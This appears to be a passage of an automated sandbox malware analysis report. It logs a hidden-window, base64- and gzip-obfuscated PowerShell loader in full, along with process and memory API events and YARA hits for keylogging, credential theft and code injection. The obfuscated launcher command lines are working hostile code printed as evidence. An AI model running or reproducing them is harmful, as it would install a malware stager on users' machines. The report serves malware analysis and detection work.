gAWAB1AG0AYgBEAHkAMABwAEIAdgBSADUAOAAvAHIAMABGAEoASwBEACcAJwArACcAJwAzAG4AcwBsAEEAYgA0AGQAQgBsAFgAbABVADQATgBRAFUAQgBXAHEAbAB3AEUAbAByAG4ARwB2AFAAagB0AGkAbgBSAE0AZQBjAHYAMABxAHAARgBOAHoANgBqADgAeQB5AGYAbgB1AFcARABTAEwATABuAGUAUAA3AC8AZwBCAGcATQBYAGcAdwA2AHcAUAAnACcAKwAnACcAYwB3ACsAeAA1ADgAOABMAFEAUAA5AFIAcgA2AHgANgBXAEkARgBpAEQASwBVAFUAUgBmAFEAMwBpADEANwBEAGsAZQAzAGkAQQBJADAASQBsAGcALwBhAGEAWQB1AFMAQgBTAFEATQBBAGQALwBzAHEAVgBXAEQARwBPAHYAQgA1AHYAUwB1ADUANAA5AFMALwBIAHoAcgBVAFoAZQBQAEQASAArAGUAdgBZAGUAVABuADcAaQA5AHMAZgBpAGkAZQBoAGUAawBIAG4AbQArAE8AMwBCADYAKwBhADYATAArAEoAZwBJAFUASQBBADEASQBEAGUAaAByAEYAbAB6AEgAcgBQAFMAQwB1ACsAZgBMAEsAdwArAEEAYwB5AEkAWAA5AGQAUgBYAC8AZgBZAHgAVABkAHEAZgBEAEwASAB2AHUAcQB2ACcAJwArACcAJwA4AEQAVwBWAFIAdABBAHYAcwBNAEEAQQBBAHsAMAB9ACcAJwApAC0AZgAnACcAPQAnACcALAAnACcAMgAnACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==
cmdline	"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMH{1}4mYCA71XeY+jxhL/P1K+A4osGWs9NvjYnVlppQfY+IjBB9j4iBW1oQ1tGvBCM5jJy3d/hY85tLPRJlJeS9Y03VXVVb86Z5+GNiNRyGXpp+GS++Pnn7jrmqAYBRxfyo1{1}v8qV8L3cECov16V0+vvhE/eF4zfS8diJAkTC7efPShrHOGSX71oPMylJcLCjBCd8hfsvZ3k4xn'+'fj3QHbjPuDK/1e69Foh+iVLFeQ7WHuTgqd4m4U{1}ajQrmYcKWF8+bffypXNnbitdb+miCZ8{1}cgThoOaQ{1}m5wv1ZKR408yPmyxqx4yiJ9qxmkbDZqM3DBO'+'{1}xDtIe'+'sYaZFzlJGax5sSfGLI3Dq1mFnAsVX4btJI5syXFinCTlKrcpXthst//hN9fnZ{1}nISIBrg5DhODoaOH4kNk5qfRQ6FM/wfgtcBotJ6G4rFSB7jHzMl8KU0ir3d8TwOs5u4P0oE/+aCagmLK5Uwa/vGapFTkrxhbX8jq'+'bnYKjAeg4IwPDPAsb9LY6C{1}TtB9HJwW5vzDQad+UmUkDPrF06ocho8jlgU5/BZMuMUV7bPiHOlXHECq/qj4sQbL3C65pHC0WYREWf7IuBNDJS+RgXJ9+O5g/ckxJ08RAGxbyHLv+cVvKf4DEjtRqaDfnz5eoGdDqbYRayAuQiOb9i6AWHPvHJKqINjyQbPJqAVOL3yVpmL5/jyINRwAOhdviFaS3tIFHyjviZHfnu9+AaiskJRklS5SQqZalc5A'+'yOKnSonhQm5'+'Xkkpi87b8ou6WkoZsVHCbuK{1}lTdgXh9VojBhcWqDVwEA0zhimyBa4FHl+sTBcm4Q9/Z4+V00FEQpZA9IegRvwEmBgsGKWIlBz0tcVGoGZoPgSHEAROfCoVLkQpm4Jsk5upCLnfK7et4S4RL1BSw3PF5pCb4{1}aMSq3ILEDIpQAXERW/9MiW/rD{1}ijxPjqGv6WXhs5Z0UGlA5J10+KIL1idEYkZoCGGkeBjBL8sXWpNPwv9TGZSLBWg5Bqzt'+'An4iCDnw'+'a/OWkOIm1/P'+'{1}FCFGi{1}kkx66r1EMjez73XJdoYOfjC'+'AbrpoMWUi9ad'+'EkFue'+'LQtmsRddV3J0OH'+'NXnk{1}FSadfN1aJQLK+pdkd+SlrJBCqrVZ/KUjNZmvcFHzAbwV8PvAFJDuNYA8ldTySB4ksDGh3qMx{1}VkNdW7Rfb6ne3ooS4+OqU6/XHxzUa1NHkiOnQVO0mEVm3w7ken{1}hOcyci7o5/0C6hZ{1}m9fA'+'RWadk'+'ZdyLo4Pk/qo6x10we3SammvSqauZUqp1EncBcvTD9NOg7zZ0xXenSznb9RbLtTUcoeX0UTe15uigNQaKNzLUmW4qmbvr0XhtyP{1}1pce7HHgaXr5riH'+'T05LfgrVTv{1}OJYabU0QzZX1tqzA/9FTnfhr/P7tp63stGhm+lPA3jfl1DnaGG0r4sL3UQu{1}NEgSt+VpI96VpjzuFuum451aq477mkuLjSbqie7MVwsnyiZLxeTqa+v54DHrtHWUOAcVv4sm89PaCao1shq59Zi3XYa3dPsSc+1udq1G85q3fHEOZWPS0FtaD0{1}RUH7uGtKud0ZZsinQ109ooUgtkzLl+Y9b0nW9V79wRqeqB5J0jDyVNBTdMxFcIgXRusT3FnIPe7PfhDX0Wi6WmHwDcSKqPbIoAumoK6Z6bhTF+cPYgt7o8I45MuRJMOmBwaD9+'+'YNb3VUJxTkgZzxsC06kaTAvapbSP7VInhUF1dLydE+jOSs3ynktxeHzvK'+'DVy/WuOOnmukD3l1RV1onzVxJaV0RI7r+KqmTujj98uUXyKbNnISs{1}diW4qzoNz//VNo3'+'D68T6nv9VENx4iEKiQZ98lbv1C'+'hWr41vEpGCg+cvg5SP4xBTGDxgNLmVConSyC56L/RI6PqXXlyMBvPBWaf3dhXumbDy0pBvR58/r0FJKD'+'3nslAb4dBlXlU4NQUBWqlwElrnGvPjtinRMecv0qpFNz6j8yyfnuWDSLLneP7/gBgMXgw6wP'+'cw+x588LQP9Rr6x6WIFiDKUURfQ3i17Dke3iAI0Ilg/aaYuSBSQMAd/sqVWDGOvB5vSu549S/HzrUZePDH+evYeTn7i9sfiiehekHnm+O3B6+a6L+JgIUIA1IDehrFlzHrPSCu+fLKw+AcyIX9dRX/fYxTdqfDLHvuqv'+'8DWVRtAvsMAAA{0}')-f'=','2')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
cmdline	C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBIAHsAMQB9ADQAbQBZAEMAQQA3ADEAWABlAFkAKwBqAHgAaABMAC8AUAAxAEsAKwBBADQAbwBzAEcAVwBzADkATgB2AGoAWQBuAFYAbABwAHAAUQBmAFkAKwBJAGoAQgBCADkAagA0AGkAQgBXADEAbwBRADEAdABHAHYAQgBDAE0ANQBqAEoAeQAzAGQALwBoAFkAOAA1AHQATABQAFIASgBsAEoAZQBTADkAWQAwADMAVgBYAFYAVgBiADgANgBaADUAKwBHAE4AaQBOAFIAeQBHAFgAcABwACsARwBTACsAKwBQAG4AbgA3AGoAcgBtAHEAQQBZAEIAUgB4AGYAeQBvADEAewAxAH0AdgA4AHEAVgA4AEwAMwBjAEUAQwBvAHYAMQA2AFYAMAArAHYAdgBoAEUALwBlAEYANAB6AGYAUwA4AGQAaQBKAEEAawBUAEMANwBlAGYAUABTAGgAcgBIAE8ARwBTAFgANwAxAG8AUABNAHkAbABKAGMATABDAGoAQgBDAGQAOABoAGYAcwB2AFoAMwBrADQAeABuACcAJwArACcAJwBmAGoAMwBRAEgAYgBqAFAAdQBEAEsALwAxAGUANgA5AEYAbwBoACsAaQBWAEwARgBlAFEANwBXAEgAdQBUAGcAcQBkADQAbQA0AFUAewAxAH0AYQBqAFEAcgBtAFkAYwBLAFcARgA4ACsAYgBmAGYAeQBwAFgATgBuAGIAaQB0AGQAYgArAG0AaQBDAFoAOAB7ADEAfQBjAGcAVABoAG8ATwBhAFEAewAxAH0AbQA1AHcAdgAxAFoASwBSADQAMAA4AHkAUABtAHkAeABxAHgANAB5AGkASgA5AHEAeABtAGsAYgBEAFoAcQBNADMARABCAE8AJwAnACsAJwAnAHsAMQB9AHgARAB0AEkAZQAnACcAKwAnACcAcwBZAGEAWgBGAHoAbABKAEcAYQB4ADUAcwBTAGYARwBMAEkAMwBEAHEAMQBtAEYAbgBBAHMAVgBYADQAYgB0AEoASQA1AHMAeQBYAEYAaQBuAEMAVABsAEsAcgBjAHAAWAB0AGgAcwB0AC8ALwBoAE4AOQBmAG4AWgB7ADEAfQBuAEkAUwBJAEIAcgBnADUARABoAE8ARABvAGEATwBIADQAawBOAGsANQBxAGYAUgBRADYARgBNAC8AdwBmAGcAdABjAEIAbwB0AEoANgBHADQAcgBGAFMAQgA3AGoASAB6AE0AbAA4AEsAVQAwAGkAcgAzAGQAOABUAHcATwBzADUAdQA0AFAAMABvAEUALwArAGEAQwBhAGcAbQBMAEsANQBVAHcAYQAvAHYARwBhAHAARgBUAGsAcgB4AGgAYgBYADgAagBxACcAJwArACcAJwBiAG4AWQBLAGoAQQBlAGcANABJAHcAUABEAFAAQQBzAGIAOQBMAFkANgBDAHsAMQB9AFQAdABCADkASABKAHcAVwA1AHYAegBEAFEAYQBkACsAVQBtAFUAawBEAFAAcgBGADAANgBvAGMAaABvADgAagBsAGcAVQA1AC8AQgBaAE0AdQBNAFUAVgA3AGIAUABpAEgATwBsAFgASABFAEMAcQAvAHEAagA0AHMAUQBiAEwAMwBDADYANQBwAEgAQwAwAFcAWQBSAEUAVwBmADcASQB1AEIATgBEAEoAUwArAFIAZwBYAEoAOQArAE8ANQBnAC8AYwBrAHgASgAwADgAUgBBAEcAeABiAHkASABMAHYAKwBjAFYAdgBLAGYANABEAEUAagB0AFIAcQBhAEQAZgBuAHoANQBlAG8ARwBkAEQAcQBiAFkAUgBhAHkAQQB1AFEAaQBPAGIAOQBpADYAQQBXAEgAUAB2AEgASgBLAHEASQBOAGoAeQBRAGIAUABKAHEAQQBWAE8ATAAzAHkAVgBwAG0ATAA1AC8AagB5AEkATgBSAHcAQQBPAGgAZAB2AGkARgBhAFMAMwB0AEkARgBIAHkAagB2AGkAWgBIAGYAbgB1ADkAKwBBAGEAaQBzAGsASgBSAGsAbABTADUAUwBRAHEAWgBhAGwAYwA1AEEAJwAnACsAJwAnAHkATwBLAG4AUwBvAG4AaABRAG0ANQAnACcAKwAnACcAWABrAGsAcABpADgANwBiADgAbwB1ADYAVwBrAG8AWgBzAFYASABDAGIAdQBLAHsAMQB9AGwAVABkAGcAWABoADkAVgBvAGoAQgBoAGMAVwBxAEQAVgB3AEUAQQAwAHoAaABpAG0AeQBCAGEANABGAEgAbAArAHMAVABCAGMAbQA0AFEAOQAvAFoANAArAFYAMAAwAEYARQBRAHAAWgBBADkASQBlAGcAUgB2AHcARQBtAEIAZwBzAEcASwBXAEkAbABCAHoAMAB0AGMAVgBHAG8ARwBaAG8AUABnAFMASABFAEEAUgBPAGYAQwBvAFYATABrAFEAcABtADQASgBzAGsANQB1AHAAQwBMAG4AZgBLADcAZQB0ADQAUwA0AFIATAAxAEIAUwB3ADMAUABGADUAcABDAGIANAB7ADEAfQBhAE0AUwBxADMASQBMAEUARABJAHAAUQBBAFgARQBSAFcALwA5AE0AaQBXAC8AcgBEAHsAMQB9AGkAagB4AFAAagBxAEcAdgA2AFcAWABoAHMANQBaADAAVQBHAGwAQQA1AEoAMQAwACsASwBJAEwAMQBpAGQARQBZAGsAWgBvAEMARwBHAGsAZQBCAGoAQgBMADgAcwBYAFcAcABOAFAAdwB2ADkAVABHAFoAUwBMAEIAVwBnADUAQgBxAHoAdAAnACcAKwAnACcAQQBuADQAaQBDAEQAbgB3ACcAJwArACcAJwBhAC8ATwBXAGsATwBJAG0AMQAvAFAAJwAnACsAJwAnAHsAMQB9AEYAQwBGAEcAaQB7ADEAfQBrAGsAeAA2ADYAcgAxAEUATQBqAGUAegA3ADMAWABKAGQAbwBZAE8AZgBqAEMAJwAnACsAJwAnAEEAYgByAHAAbwBNAFcAVQBpADkAYQBkACcAJwArACcAJwBFAGsARgB1AGUAJwAnACsAJwAnAEwAUQB0AG0AcwBSAGQAZABWADMASgAwAE8ASAAnACcAKwAnACcATgBYAG4AawB7ADEAfQBGAFMAYQBkAGYATgAxAGEASgBRAEwASwArAHAAZABrAGQAKwBTAGwAcgBKAEIAQwBxAHIAVgBaAC8ASwBVAGoATgBaAG0AdgBjAEYASAB6AEEAYgB3AFYAOABQAHYAQQBGAEoARAB1AE4AWQBBADgAbABkAFQAeQBTAEIANABrAHMARABHAGgAMwBxAE0AeAB7ADEAfQBWAGsATgBkAFcANwBSAGYAYgA2AG4AZQAzAG8AbwBTADQAKwBPAHEAVQA2AC8AWABIAHgAegBVAGEAMQBOAEgAawBpAE8AbgBRAFYATwAwAG0ARQBWAG0AMwB3ADcAawBlAG4AewAxAH0AaABPAGMAeQBjAGkANwBvADUALwAwAEMANgBoAFoAewAxAH0AbQA5AGYAQQAnACcAKwAnACcAUgBXAGEAZABrACcAJwArACcAJwBaAGQAeQBMAG8ANABQAGsALwBxAG8ANgB4ADEAMAB3AGUAMwBTAGEAbQBtAHYAUwBxAGEAdQBaAFUAcQBwADEARQBuAGMAQgBjAHYAVABEADkATgBPAGcANwB6AFoAMAB4AFgAZQBuAFMAegBuAGIAOQBSAGIATAB0AFQAVQBjAG8AZQBYADAAVQBUAGUAMQA1AHUAaQBnAE4AUQBhAEsATgB6AEwAVQBtAFcANABxAG0AYgB2AHIAMABYAGgAdAB5AFAAewAxAH0AMQBwAGMAZQA3AEgASABnAGEAWAByADUAcgBpAEgAJwAnACsAJwAnAFQAMAA1AEwAZgBnAHIAVgBUAHYAewAxAH0ATwBKAFkAYQBiAFUAMABRAHoAWgBYADEAdABxAHoAQQAvADkARgBUAG4AZgBoAHIALwBQADcAdABwADYAMwBzAHQARwBoAG0AKwBsAFAAQQAzAGoAZgBsADEARABuAGEARwBHADAAcgA0AHMATAAzAFUAUQB1AHsAMQB9AE4ARQBnAFMAdAArAFYAcABJADkANgBWAHAAagB6AHUARgB1AHUAbQA0ADUAMQBhAHEANAA3ADcAbQBrAHUATABqAFMAYgBxAGkAZQA3AE0AVgB3AHMAbgB5AGkAWgBMAHgAZQBUAHEAYQArAHYANQA0AEQASAByAHQASABXAFUATwBBAGMAVgB2ADQAcwBtADgAOQBQAGEAQwBhAG8AMQBzAGgAcQA1ADkAWgBpADMAWABZAGEAMwBkAFAAcwBTAGMAKwAxAHUAZABxADEARwA4ADUAcQAzAGYASABFAE8AWgBXAFAAUwAwAEYAdABhAEQAMAB7ADEAfQBSAFUASAA3AHUARwB0AEsAdQBkADAAWgBaAHMAaQBuAFEAMQAwADkAbwBvAFUAZwB0AGsAegBMAGwAKwBZADkAYgAwAG4AVwA5AFYANwA5AHcAUgBxAGUAcQBCADUASgAwAGoARAB5AFYATgBCAFQAZABNAHgARgBjAEkAZwBYAFIAdQBzAFQAMwBGAG4ASQBQAGUANwBQAGYAaABEAFgAMABXAGkANgBXAG0ASAB3AEQAYwBTAEsAcQBQAGIASQBvAEEAdQBtAG8ASwA2AFoANgBiAGgAVABGACsAYwBQAFkAZwB0ADcAbwA4AEkANAA1AE0AdQBSAEoATQBPAG0AQgB3AGEARAA5ACsAJwAnACsAJwAnAFkATgBiADMAVgBVAEoAeABUAGsAZwBaAHoAeABzAEMAMAA2AGsAYQBUAEEAdgBhAHAAYgBTAFAANwBWAEkAbgBoAFUARgAxAGQATAB5AGQARQArAGoATwBTAHMAMwB5AG4AawB0AHgAZQBIAHoAdgBLACcAJwArACcAJwBEAFYAeQAvAFcAdQBPAE8AbgBtAHUAawBEADMAbAAxAFIAVgAxAG8AbgB6AFYAeABKAGEAVgAwAFIASQA3AHIAKwBLAHEAbQBUAHUAagBqADkAOAB1AFUAWAB5AEsAYgBOAG4ASQBTAHMAewAxAH0AZABpAFcANABxAHoAbwBOAHoALwAvAFYATgBvADMAJwAnACsAJwAnAEQANgA4AFQANgBuAHYAOQBWAEUATgB4ADQAaQBFAEsAaQBRAFoAOQA4AGwAYgB2ADEAQwAnACcAKwAnACcAaABXAHIANAAxAHYARQBwAEcAQwBnACsAYwB2AGcANQBTAFAANAB4AEIAVABHAEQAeABnAE4ATABtAFYAQwBvAG4AUwB5AEMANQA2AEwALwBSAEkANgBQAHEAWABYAGwAeQBNAEIAdgBQAEIAVwBhAGYAMwBkAGgAWAB1AG0AYgBEAHkAMABwAEIAdgBSADUAOAAvAHIAMABGAEoASwBEACcAJwArACcAJwAzAG4AcwBsAEEAYgA0AGQAQgBsAFgAbABVADQATgBRAFUAQgBXAHEAbAB3AEUAbAByAG4ARwB2AFAAagB0AGkAbgBSAE0AZQBjAHYAMABxAHAARgBOAHoANgBqADgAeQB5AGYAbgB1AFcARABTAEwATABuAGUAUAA3AC8AZwBCAGcATQBYAGcAdwA2AHcAUAAnACcAKwAnACcAYwB3ACsAeAA1ADgAOABMAFEAUAA5AFIAcgA2AHgANgBXAEkARgBpAEQASwBVAFUAUgBmAFEAMwBpADEANwBEAGsAZQAzAGkAQQBJADAASQBsAGcALwBhAGEAWQB1AFMAQgBTAFEATQBBAGQALwBzAHEAVgBXAEQARwBPAHYAQgA1AHYAUwB1ADUANAA5AFMALwBIAHoAcgBVAFoAZQBQAEQASAArAGUAdgBZAGUAVABuADcAaQA5AHMAZgBpAGkAZQBoAGUAawBIAG4AbQArAE8AMwBCADYAKwBhADYATAArAEoAZwBJAFUASQBBADEASQBEAGUAaAByAEYAbAB6AEgAcgBQAFMAQwB1ACsAZgBMAEsAdwArAEEAYwB5AEkAWAA5AGQAUgBYAC8AZgBZAHgAVABkAHEAZgBEAEwASAB2AHUAcQB2ACcAJwArACcAJwA4AEQAVwBWAFIAdABBAHYAcwBNAEEAQQBBAHsAMAB9ACcAJwApAC0AZgAnACcAPQAnACcALAAnACcAMgAnACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Sept. 30, 2024, 11:23 a.m.	thread_identifier: 2928 thread_handle: 0x0000044c process_identifier: 2924 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMH{1}4mYCA71XeY+jxhL/P1K+A4osGWs9NvjYnVlppQfY+IjBB9j4iBW1oQ1tGvBCM5jJy3d/hY85tLPRJlJeS9Y03VXVVb86Z5+GNiNRyGXpp+GS++Pnn7jrmqAYBRxfyo1{1}v8qV8L3cECov16V0+vvhE/eF4zfS8diJAkTC7efPShrHOGSX71oPMylJcLCjBCd8hfsvZ3k4xn'+'fj3QHbjPuDK/1e69Foh+iVLFeQ7WHuTgqd4m4U{1}ajQrmYcKWF8+bffypXNnbitdb+miCZ8{1}cgThoOaQ{1}m5wv1ZKR408yPmyxqx4yiJ9qxmkbDZqM3DBO'+'{1}xDtIe'+'sYaZFzlJGax5sSfGLI3Dq1mFnAsVX4btJI5syXFinCTlKrcpXthst//hN9fnZ{1}nISIBrg5DhODoaOH4kNk5qfRQ6FM/wfgtcBotJ6G4rFSB7jHzMl8KU0ir3d8TwOs5u4P0oE/+aCagmLK5Uwa/vGapFTkrxhbX8jq'+'bnYKjAeg4IwPDPAsb9LY6C{1}TtB9HJwW5vzDQad+UmUkDPrF06ocho8jlgU5/BZMuMUV7bPiHOlXHECq/qj4sQbL3C65pHC0WYREWf7IuBNDJS+RgXJ9+O5g/ckxJ08RAGxbyHLv+cVvKf4DEjtRqaDfnz5eoGdDqbYRayAuQiOb9i6AWHPvHJKqINjyQbPJqAVOL3yVpmL5/jyINRwAOhdviFaS3tIFHyjviZHfnu9+AaiskJRklS5SQqZalc5A'+'yOKnSonhQm5'+'Xkkpi87b8ou6WkoZsVHCbuK{1}lTdgXh9VojBhcWqDVwEA0zhimyBa4FHl+sTBcm4Q9/Z4+V00FEQpZA9IegRvwEmBgsGKWIlBz0tcVGoGZoPgSHEAROfCoVLkQpm4Jsk5upCLnfK7et4S4RL1BSw3PF5pCb4{1}aMSq3ILEDIpQAXERW/9MiW/rD{1}ijxPjqGv6WXhs5Z0UGlA5J10+KIL1idEYkZoCGGkeBjBL8sXWpNPwv9TGZSLBWg5Bqzt'+'An4iCDnw'+'a/OWkOIm1/P'+'{1}FCFGi{1}kkx66r1EMjez73XJdoYOfjC'+'AbrpoMWUi9ad'+'EkFue'+'LQtmsRddV3J0OH'+'NXnk{1}FSadfN1aJQLK+pdkd+SlrJBCqrVZ/KUjNZmvcFHzAbwV8PvAFJDuNYA8ldTySB4ksDGh3qMx{1}VkNdW7Rfb6ne3ooS4+OqU6/XHxzUa1NHkiOnQVO0mEVm3w7ken{1}hOcyci7o5/0C6hZ{1}m9fA'+'RWadk'+'ZdyLo4Pk/qo6x10we3SammvSqauZUqp1EncBcvTD9NOg7zZ0xXenSznb9RbLtTUcoeX0UTe15uigNQaKNzLUmW4qmbvr0XhtyP{1}1pce7HHgaXr5riH'+'T05LfgrVTv{1}OJYabU0QzZX1tqzA/9FTnfhr/P7tp63stGhm+lPA3jfl1DnaGG0r4sL3UQu{1}NEgSt+VpI96VpjzuFuum451aq477mkuLjSbqie7MVwsnyiZLxeTqa+v54DHrtHWUOAcVv4sm89PaCao1shq59Zi3XYa3dPsSc+1udq1G85q3fHEOZWPS0FtaD0{1}RUH7uGtKud0ZZsinQ109ooUgtkzLl+Y9b0nW9V79wRqeqB5J0jDyVNBTdMxFcIgXRusT3FnIPe7PfhDX0Wi6WmHwDcSKqPbIoAumoK6Z6bhTF+cPYgt7o8I45MuRJMOmBwaD9+'+'YNb3VUJxTkgZzxsC06kaTAvapbSP7VInhUF1dLydE+jOSs3ynktxeHzvK'+'DVy/WuOOnmukD3l1RV1onzVxJaV0RI7r+KqmTujj98uUXyKbNnISs{1}diW4qzoNz//VNo3'+'D68T6nv9VENx4iEKiQZ98lbv1C'+'hWr41vEpGCg+cvg5SP4xBTGDxgNLmVConSyC56L/RI6PqXXlyMBvPBWaf3dhXumbDy0pBvR58/r0FJKD'+'3nslAb4dBlXlU4NQUBWqlwElrnGvPjtinRMecv0qpFNz6j8yyfnuWDSLLneP7/gBgMXgw6wP'+'cw+x588LQP9Rr6x6WIFiDKUURfQ3i17Dke3iAI0Ilg/aaYuSBSQMAd/sqVWDGOvB5vSu549S/HzrUZePDH+evYeTn7i9sfiiehekHnm+O3B6+a6L+JgIUIA1IDehrFlzHrPSCu+fLKw+AcyIX9dRX/fYxTdqfDLHvuqv'+'8DWVRtAvsMAAA{0}')-f'=','2')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000458	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 30, 2024, 11:23 a.m.	process_identifier: 2924 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x056a0000 process_handle: 0xffffffff	1	0	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 30, 2024, 11:23 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Sept. 30, 2024, 11:23 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (50 out of 62 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
